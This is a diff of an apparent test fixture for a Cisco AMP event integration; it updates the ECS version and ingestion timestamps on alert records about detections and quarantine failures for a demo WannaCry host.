                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -5861,7 +5861,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5881,7 +5881,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843719050Z",
+                "ingested": "2021-09-13T18:07:04.510463204Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -5936,7 +5936,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5956,7 +5956,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843721187Z",
+                "ingested": "2021-09-13T18:07:04.510465143Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6011,7 +6011,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -6031,7 +6031,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843723102Z",
+                "ingested": "2021-09-13T18:07:04.510467022Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6086,7 +6086,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -6106,7 +6106,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843725006Z",
+                "ingested": "2021-09-13T18:07:04.510468869Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6161,7 +6161,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -6181,7 +6181,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843726903Z",
+                "ingested": "2021-09-13T18:07:04.510470729Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6236,7 +6236,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -6256,7 +6256,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843728796Z",
+                "ingested": "2021-09-13T18:07:04.510472598Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6311,7 +6311,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -6331,7 +6331,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843730684Z",
+                "ingested": "2021-09-13T18:07:04.510474450Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6386,7 +6386,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -6406,7 +6406,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843732572Z",
+                "ingested": "2021-09-13T18:07:04.510476347Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6472,7 +6472,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -6502,7 +6502,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843734515Z",
+                "ingested": "2021-09-13T18:07:04.510478192Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -6570,7 +6570,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -6602,7 +6602,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843736405Z",
+                "ingested": "2021-09-13T18:07:04.510480074Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -6661,7 +6661,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -6691,7 +6691,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843738275Z",
+                "ingested": "2021-09-13T18:07:04.510481931Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -6744,7 +6744,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -6764,7 +6764,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843740157Z",
+                "ingested": "2021-09-13T18:07:04.510483781Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -6815,7 +6815,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -6835,7 +6835,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843765247Z",
+                "ingested": "2021-09-13T18:07:04.510485650Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6890,7 +6890,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -6910,7 +6910,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843776640Z",
+                "ingested": "2021-09-13T18:07:04.510487525Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -6965,7 +6965,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -6985,7 +6985,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843778667Z",
+                "ingested": "2021-09-13T18:07:04.510489390Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 